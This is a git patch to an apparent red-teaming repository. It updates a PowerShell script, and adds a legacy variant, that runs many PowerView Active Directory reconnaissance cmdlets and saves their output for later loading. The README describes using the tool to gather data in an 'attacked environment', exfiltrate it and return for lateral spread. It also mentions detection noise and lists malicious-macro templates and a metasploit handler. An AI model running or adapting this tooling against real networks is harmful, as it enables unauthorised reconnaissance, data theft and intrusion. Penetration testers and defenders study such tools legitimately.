From 04bd92f5021d99aa701e5cfcccbd9069bdeeb11b Mon Sep 17 00:00:00 2001 From: mb Date: Wed, 19 Dec 2018 15:11:15 +0100 Subject: [PATCH] Updated Export-ReconData --- red-teaming/Export-ReconData.ps1 | 172 +++++++++++++++++-------------- red-teaming/README.md | 14 ++- red-teaming/Save-ReconData.ps1 | 113 ++++++++++++++++++++ 3 files changed, 219 insertions(+), 80 deletions(-) create mode 100644 red-teaming/Save-ReconData.ps1 diff --git a/red-teaming/Export-ReconData.ps1 b/red-teaming/Export-ReconData.ps1 index 4e8f5df..984db9a 100644 --- a/red-teaming/Export-ReconData.ps1 +++ b/red-teaming/Export-ReconData.ps1 @@ -1,113 +1,131 @@ #requires -version 2 <# + This script launches many PowerView cmdlets and stores their output in Clixml + files for later processing. This script is compatible with newest PowerView's version, + from dev branch (as of 2018) that uses Get-Domain*, Find-* (instead of Invoke-*) and others cmdlets. - This script launches many PowerView cmdlets and stores their output - in Clixml files for later processing. - - Author: Mariusz B. (mgeeky), '18 - License: BSD 3-Clause - Required Dependencies: PowerSploit's Recon.psm1 + Author: Mariusz B. (mgeeky), '18 + License: BSD 3-Clause + Required Dependencies: PowerSploit's Recon.psm1 #> function Export-ReconData { - $DirName = (Get-Date).ToString("PowerView-MM-dd-yyyy-hh-mm-ss") - New-Item -Name $DirName -ItemType Directory | Out-Null + $DirName = (Get-Date).ToString("PowerView-MM-dd-yyyy-hh-mm-ss") + New-Item -Name $DirName -ItemType Directory | Out-Null - Write-Output "`n:: Logs to be stored in: $DirName`n" + Write-Output "`n:: Logs to be stored in: $DirName`n" - $ReconModuleCommands = Get-Command -Module Recon - $Commands = @() + $ReconModuleCommands = Get-Command -Module Recon + $Commands = @() - $ReconModuleCommands ` - | Where-Object {$_.Name -like "Get-Net*"} ` - | Select Name ` - | ForEach-Object {$Commands += $_.Name} + $ReconModuleCommands ` + | Where-Object {$_.Name -like "Get-Domain*" -or $_.Name -like "Get-Forest*" -or $_.Name -like "Get-Net*"} ` + | Select Name ` + | ForEach-Object {$Commands += $_.Name} - $Commands += "Invoke-UserHunter -ShowAll" - $Commands += "Invoke-StealthUserHunter -ShowAll" - $Commands += "Invoke-FileFinder -SearchSYSVol" - $Commands += "Invoke-ShareFinder" - $Commands += "Invoke-MapDomainTrust" - $Commands += "Find-GPOLocation" - $Commands += "Get-NetUser -AdminCount" - $Commands += "Find-ForeignUser" - $Commands += "Find-ForeignGroup" - $Commands += "Invoke-FileFinder" + $Commands += "Find-DomainUserLocation -ShowAll" + $Commands += "Find-InterestingDomainShareFile" + $Commands += "Find-DomainShare" + $Commands += "Get-DomainTrustMapping" + $Commands += "Get-DomainGPOUserLocalGroupMapping" + $Commands += "Get-DomainUser -AdminCount" + $Commands += "Get-DomainForeignUser" + $Commands += "Get-DomainForeignGroupMember" + $Commands += "Find-InterestingDomainShareFile" - $Commands | ForEach-Object { - $Name = $_ - $Name -match "[A-Za-z]+-(.+)" | Out-Null + $IdentityBased = @( + "Get-DomainGroupMember", + "Get-DomainGPOComputerLocalGroupMapping", + "Get-DomainGPOUserLocalGroupMapping" + ) - $FileName = $matches[1] + ".xml" - $FileName = $FileName -replace ' ','' + $ToSkip = @( + "Get-DomainDNSRecord", + "Get-DomainObject", + "Get-DomainObjectAttributeHistory", + "Get-DomainObjectLinkedAttributeHistory", + "Get-DomainSPNTicket", + "Get-DomainUserEvent", + "Get-ForestSchemaClass" + ) - If ($Name -like "Get-Net*") - { - #$Name = $Name + " -Recurse" - } + $Commands | ForEach-Object { + $Name = $_ + $Name -match "[A-Za-z]+-(.+)" | Out-Null - Write-Output "--- $Name ---" - $Name | Invoke-Expression | Export-Clixml $DirName\$FileName - Write-Output "Done.`n" - } + $FileName = $matches[1] + ".xml" + $FileName = $FileName -replace ' ','' + + If ($IdentityBased -match $Name ) { + $Name = $Name + " -Identity 'Domain Admins'" + } + ElseIf ($ToSkip -match $Name) { + } + Else { + Write-Output "--- $Name ---" + $Name | Invoke-Expression | Export-Clixml $DirName\$FileName + Write-Output "Done.`n" + } + + } } function Import-ReconData { - Param - ( - [Parameter(Position = 0, Mandatory = $True)] - [ValidateNotNullOrEmpty()] - [String] - $DirName - ) - $path = Get-Location - Set-Location -Path $DirName + Param + ( + [Parameter(Position = 0, Mandatory = $True)] + [ValidateNotNullOrEmpty()] + [String] + $DirName + ) + $path = Get-Location + Set-Location -Path $DirName - Get-ChildItem . -Filter *.xml | - Foreach-Object { - $Name = $_.BaseName -replace '-','' - $Results = Import-Clixml -Path "$_" - New-Variable -Name $Name -Force -Value $Results -Scope Global - Write-Output "Loaded `$$Name results." - } + Get-ChildItem . -Filter *.xml | + Foreach-Object { + $Name = $_.BaseName -replace '-','' + $Results = Import-Clixml -Path "$_" + New-Variable -Name $Name -Force -Value $Results -Scope Global + Write-Output "Loaded `$$Name results." + } - Set-Location -Path $path + Set-Location -Path $path } function Get-ReconData { - Param - ( - [Parameter(Position = 0, Mandatory = $True)] - [ValidateNotNullOrEmpty()] - [String] - $DirName - ) - $path = Get-Location - $Variables = Get-Variable - Set-Location -Path $DirName + Param + ( + [Parameter(Position = 0, Mandatory = $True)] + [ValidateNotNullOrEmpty()] + [String] + $DirName + ) + $path = Get-Location + $Variables = Get-Variable + Set-Location -Path $DirName - Get-ChildItem . -Filter *.xml | - Foreach-Object { - $Name = $_.BaseName -replace '-','' - If ($Variables | Where-Object { $_.Name -eq $Name }) - { - Write-Output "Previously loaded: `$$Name" - } - } + Get-ChildItem . -Filter *.xml | + Foreach-Object { + $Name = $_.BaseName -replace '-','' + If ($Variables | Where-Object { $_.Name -eq $Name }) + { + Write-Output "Previously loaded: `$$Name" + } + } - Set-Location -Path $path + Set-Location -Path $path } Try { - # You need to be in PowerSploit\Recon directory - Import-Module .\Recon.psm1 + # You need to be in PowerSploit\Recon directory + Import-Module .\Recon.psm1 } Catch [System.Exception] { - exit + exit } diff --git a/red-teaming/README.md b/red-teaming/README.md index 7fcf9b3..22c0bb7 100644 --- a/red-teaming/README.md +++ b/red-teaming/README.md @@ -18,10 +18,11 @@ IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Com - **`delete-warning-div-macro.vbs`** - VBA Macro function to be used as a Social Engineering trick removing "Enable Content" warning message as the topmost floating text box with given name. ([gist](https://gist.github.com/mgeeky/9cb6acdec31c8a70cc037c84c77a359c)) -- **`Export-ReconData.ps1`** - Powershell script leveraging [PowerSploit Recon](https://github.com/PowerShellMafia/PowerSploit) module (PowerView) to save output from Reconnaissance cmdlets like `Get-Net*`, `Invoke-*` into _Clixml_ files. Those files (stored in an output directory as separate XML files) can later be extracted from attacked environment and loaded to a new powershell runspace using the same script. Very useful when we want to obtain as many data as possible, then exfiltrate that data, review it in our safe place and then get back to attacked domain for lateral spread. **Warning**: Be careful though, as this script launches many reconnaissance commands one by one, this WILL generate a lot of noise. Microsoft ATA for instance for sure pick you up with _"Reconnaissance using SMB session enumeration"_ after you've launched `Invoke-UserHunter`. +- **`Export-ReconData.ps1`** - Powershell script leveraging [PowerSploit Recon](https://github.com/PowerShellMafia/PowerSploit) module (PowerView) to save output from Reconnaissance cmdlets like `Get-*`, `Find-*` into _Clixml_ files. Those files (stored in an output directory as separate XML files) can later be extracted from attacked environment and loaded to a new powershell runspace using the same script. Very useful when we want to obtain as many data as possible, then exfiltrate that data, review it in our safe place and then get back to attacked domain for lateral spread. **Warning**: Be careful though, as this script launches many reconnaissance commands one by one, this WILL generate a lot of noise. Microsoft ATA for instance for sure pick you up with _"Reconnaissance using SMB session enumeration"_ after you've launched `Invoke-UserHunter`. - **WARNING:** At the moment this script works only with older version of PowerView - from before 12 dev 2016, where - it had Get-NetUser/Get-NetComputer/Get-Net* commands only. + **WARNING:** This script is compatible with newer version of PowerView (coming from dev branch as of 2018), + that exposed various `Get-Domain*`, `Find-*` cmdlets. In order to save recon's data from the older PowerView, + refer to my `Save-ReconData.ps1` script in this directory. Exposed functions: - `Export-ReconData` - Launches many cmdlets and exports their Clixml outputs. @@ -201,6 +202,13 @@ PS E:\PowerSploit\Recon> Get-DomainOU | Get-DomainOUTree - [**`RobustPentestMacro`**](https://github.com/mgeeky/RobustPentestMacro) - This is a rich-featured Visual Basic macro code for use during Penetration Testing assignments, implementing various advanced post-exploitation techniques. + +- **`Save-ReconData.ps1`** - Powershell script leveraging [PowerSploit Recon](https://github.com/PowerShellMafia/PowerSploit) module (PowerView) to save output from Reconnaissance cmdlets like `Get-*`, `Find-*` into _Clixml_ files. It differs from `Export-ReconData.ps1` in that it supports only older PowerView version from before 12 dec 2016. + Exposed functions: + - `Save-ReconData` - Launches many cmdlets and exports their Clixml outputs. + - `Load-ReconData -DirName ` - Loads Clixml previously exported outputs and stores them in Global variables reachable when script terminates. + - `Get-ReconData -DirName ` - Gets names of variables that were created and contains previously imported data. + - **`set-handler.rc`** - Quickly set metasploit's multi-handler + web_delivery (separated) handler for use with powershell. ([gist](https://gist.github.com/mgeeky/bf4d732aa6e602ca9b77d089fd3ea7c9)) - **`SubstitutePageMacro.vbs`** - This is a template for the Malicious Macros that would like to substitute primary contents of the document (like luring/fake warnings to "Enable Content") and replace document's contents with what is inside of an AutoText named `RealDoc` (configured via variable `autoTextTemplateName` ). ([gist](https://gist.github.com/mgeeky/3c705560c5041ab20c62f41e917616e6)) diff --git a/red-teaming/Save-ReconData.ps1 b/red-teaming/Save-ReconData.ps1 new file mode 100644 index 0000000..4e8f5df --- /dev/null +++ b/red-teaming/Save-ReconData.ps1 @@ -0,0 +1,113 @@ +#requires -version 2 + +<# + + This script launches many PowerView cmdlets and stores their output + in Clixml files for later processing. + + Author: Mariusz B. (mgeeky), '18 + License: BSD 3-Clause + Required Dependencies: PowerSploit's Recon.psm1 +#> + +function Export-ReconData +{ + $DirName = (Get-Date).ToString("PowerView-MM-dd-yyyy-hh-mm-ss") + New-Item -Name $DirName -ItemType Directory | Out-Null + + Write-Output "`n:: Logs to be stored in: $DirName`n" + + $ReconModuleCommands = Get-Command -Module Recon + $Commands = @() + + $ReconModuleCommands ` + | Where-Object {$_.Name -like "Get-Net*"} ` + | Select Name ` + | ForEach-Object {$Commands += $_.Name} + + $Commands += "Invoke-UserHunter -ShowAll" + $Commands += "Invoke-StealthUserHunter -ShowAll" + $Commands += "Invoke-FileFinder -SearchSYSVol" + $Commands += "Invoke-ShareFinder" + $Commands += "Invoke-MapDomainTrust" + $Commands += "Find-GPOLocation" + $Commands += "Get-NetUser -AdminCount" + $Commands += "Find-ForeignUser" + $Commands += "Find-ForeignGroup" + $Commands += "Invoke-FileFinder" + + $Commands | ForEach-Object { + $Name = $_ + $Name -match "[A-Za-z]+-(.+)" | Out-Null + + $FileName = $matches[1] + ".xml" + $FileName = $FileName -replace ' ','' + + If ($Name -like "Get-Net*") + { + #$Name = $Name + " -Recurse" + } + + Write-Output "--- $Name ---" + $Name | Invoke-Expression | Export-Clixml $DirName\$FileName + Write-Output "Done.`n" + } +} + +function Import-ReconData +{ + Param + ( + [Parameter(Position = 0, Mandatory = $True)] + [ValidateNotNullOrEmpty()] + [String] + $DirName + ) + $path = Get-Location + Set-Location -Path $DirName + + Get-ChildItem . -Filter *.xml | + Foreach-Object { + $Name = $_.BaseName -replace '-','' + $Results = Import-Clixml -Path "$_" + New-Variable -Name $Name -Force -Value $Results -Scope Global + Write-Output "Loaded `$$Name results." + } + + Set-Location -Path $path +} + +function Get-ReconData +{ + Param + ( + [Parameter(Position = 0, Mandatory = $True)] + [ValidateNotNullOrEmpty()] + [String] + $DirName + ) + $path = Get-Location + $Variables = Get-Variable + Set-Location -Path $DirName + + Get-ChildItem . -Filter *.xml | + Foreach-Object { + $Name = $_.BaseName -replace '-','' + If ($Variables | Where-Object { $_.Name -eq $Name }) + { + Write-Output "Previously loaded: `$$Name" + } + } + + Set-Location -Path $path +} + +Try +{ + # You need to be in PowerSploit\Recon directory + Import-Module .\Recon.psm1 +} +Catch [System.Exception] +{ + exit +}